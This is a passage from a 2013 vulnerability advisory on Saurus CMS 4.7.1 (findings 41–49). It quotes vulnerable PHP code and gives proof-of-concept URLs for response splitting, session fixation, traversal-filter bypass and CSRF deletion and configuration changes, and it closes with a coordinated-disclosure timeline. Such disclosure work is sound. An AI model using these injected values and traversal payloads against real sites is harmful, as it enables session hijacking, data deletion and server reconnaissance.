Tests: http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a Result (using php 5.3.24, from errorlog): Header may not contain more than a single header, new line detected ############################################################################### 41. HTTP Response Splitting in "admin/publish.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 2. logged in as Saurus CMS user with publish privileges Php script "admin/publish.php" line 118: ------------------------[ source code start ]---------------------------------- header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site->CONF[hostname].$site->fdat[url]); ------------------------[ source code end ]------------------------------------ ############################################################################### 42. HTTP Response Splitting in "add_comment.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "add_comment.php" line 135: ------------------------[ source code start ]---------------------------------- header('Location: '.urldecode(preg_replace("!\r|\n.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2'); .. header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://': 'https://').$site->CONF['hostname'].$site->CONF['wwwroot']. ($site->in_editor?'/editor':'').'/?'.(($site->fdat['tpl'] || $site->fdat['c_tpl'])&&!$site->fdat['inserted_id']&& !$site->fdat['jump_to_parent']?'tpl='.$site->fdat['tpl']. '&c_tpl='.$site->fdat['c_tpl'].'&':'').'id='.$site->fdat['id'].'&lisa_alert=2'); .. if ($site->fdat['output_device'] == 'pda') { if (strlen($site->fdat['text']) < 2 || strlen($site->fdat['nimi']) < 2) { myRedirect($site->fdat['redirect_url']); .. header("Location: ".urldecode($site->fdat['redirect_url'])); .. function myRedirect($url) { .. header("Location: " . urldecode($url)); } ------------------------[ source code end ]------------------------------------ ############################################################################### 43. Information leakage in "admin/check_requirements.php" ############################################################################### Reason: insufficient access control Test: http://localhost/saurus471/admin/check_requirements.php Result: Simple GET request as shown above reveals some information about web server: MySQL version, Webserver version, PHP version, multiple php setting values, multiple directory permissions. Anyone can access this diagnostic script, no access control exist. ############################################################################### 44. Session Fixation vulnerability in "admin/ajax_response.php" ############################################################################### Attack vector: 1. user-supplied POST parameter "PHPSESSID" Preconditions: none Some years ago PHP session fixation attacks were easy to exploit: just add PHPSESSID=112233445566 to URI and done. Modern PHP versions are more secure by default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0, "session.use_trans_sid" defaults to "0". So even if PHP-based web application does have session fixation vulnerability, many real world installations are hard to exploit. Now let's look at Saurus CMS source code. Php script "admin/ajax_response.php" line 27: ------------------------[ source code start ]---------------------------------- if(isset($_POST['PHPSESSID'])) { session_id($_POST['PHPSESSID']); session_start(); } ------------------------[ source code end ]------------------------------------ We can see, that user-submitted POST parameter PHPSESSID is used as argument for PHP function "session_id()", which is followed by "session_start()". It means, that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session fixation attacks are possible. Test:
Press "Test button" and then observe server response: HTTP/1.1 200 OK Date: Wed, 05 Jun 2013 10:26:19 GMT Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=1122334455667788; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/javascript Now log in as Saurus CMS admin and look for session cookies: GET /saurus471/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: logged=1; PHPSESSID=1122334455667788 Connection: keep-alive We can see, that after authentication session ID does not change, which indicates Session Fixation vulnerability existence. Solution: implement session ID renewal after successful user authentication. ############################################################################### 45. Directory Traversal vulnerability in "admin/ajax_response.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "name" Preconditions: 1. logged in as valid Saurus CMS user Result: logged in Saurus CMS user can test existence of arbitrary files on remote server filesystem. Php script "admin/ajax_response.php" line 52: ------------------------[ source code start ]---------------------------------- // check if a file exists if($site->user->user_id && $_REQUEST['op'] == 'check_file' && $site->fdat['name']) { include_once($class_path.'adminpage.inc.php'); $pathinfo = str_replace(array('../', './', '..\\', '.\\'), '', $site->fdat['name']); $pathinfo = explode('/', $pathinfo); $filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true); unset($pathinfo[count($pathinfo) - 1]); $dirname = implode('/', $pathinfo); if(file_exists($site->absolute_path.$dirname.'/'.$filename)) { echo '{"file_exists": 1}'; } else { echo '{"file_exists": 0}'; } ------------------------[ source code end ]------------------------------------ As seen above, php function "str_replace()" is used for filtering out possible directory traversal substrings. Such filtering is not secure enough and can be bypassed with specially crafted parameter "name". Test 1: http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt Result: {"file_exists": 0} Test 2: http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt Result: {"file_exists": 1} ############################################################################### 46. Cross-Site Request Forgery in "admin/trash.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized deletion of objects from Recycle Bin Php script "admin/trash.php" line 85: ------------------------[ source code start ]---------------------------------- if($site->fdat['delete_all'] && count($site->fdat['objects'])) { //empty trash for($i = count($site->fdat['objects']) - 1; $i >= 0; $i--) { foreach($site->fdat['objects'][$i] as $object_id => $values) if($object_id) { $delete_objs = new Alamlist(array( 'parent' => $object_id, 'klass' => $classes, )); while($object = $delete_objs->next()) { $object->del(); ------------------------[ source code end ]------------------------------------ As seen above, there is no protection against CSRF. Test: http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1 Result (from sitelog): "Recycle Bin emptied" Solution: use "verify_form_token()" function in critical places ############################################################################### 47. Cross-Site Request Forgery in "admin/change_config.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized modification of site configuration Php script "admin/change_config.php" line 85: ------------------------[ source code start ]---------------------------------- if ($site->fdat[salvesta]==1) { foreach ($site->fdat as $key=>$value) { if ( substr ($key, 0, 4) == "cff_" ) { $sql = $site->db->prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4)); $sth = new SQL($sql); ------------------------[ source code end ]------------------------------------ We can see, that there is no protection against CSRF. Tests: http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0 http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1 Result: Saurus CMS configuration setting "save_error_log" has been changed Solution: use "verify_form_token()" function in critical places ############################################################################### 48. Cross-Site Request Forgery in "admin/forms.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized deletion of forms Php script "admin/forms.php" line 137: ------------------------[ source code start ]---------------------------------- if($site->fdat['op2'] == 'deleteconfirmed' && $site->fdat['form_id']) { # delete form $sql = $site->db->prepare("DELETE FROM forms WHERE form_id=?",$site->fdat['form_id']); $sth = new SQL($sql); ------------------------[ source code end ]------------------------------------ We can see, that there is no protection against CSRF. Test: http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5 Result (from sitelog): "Form 'testform' deleted" Solution: use "verify_form_token()" function in critical places ############################################################################### 49. Full Path Disclosure in multiple scripts ############################################################################### Preconditions: 1. PHP setting "display_errors = On" Tests: http://localhost/saurus471/admin/edit_object.php Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\edit_object.php on line 1299 http://localhost/saurus471/admin/edit_pilt.php Fatal error: Class 'Timer' not found in C:\apache_www\saurus471\admin\edit_pilt.php on line 21 http://localhost/saurus471/admin/templates.php Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\templates.php on line 57 Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 06.06.2013 -> First email to vendor 06.06.2013 -> First response email from vendor 06.06.2013 -> Sending detailed information to vendor 07.06.2013 -> Vendor started fixing found problems 21.06.2013 -> Found problems are fixed 14.07.2013 -> Current advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------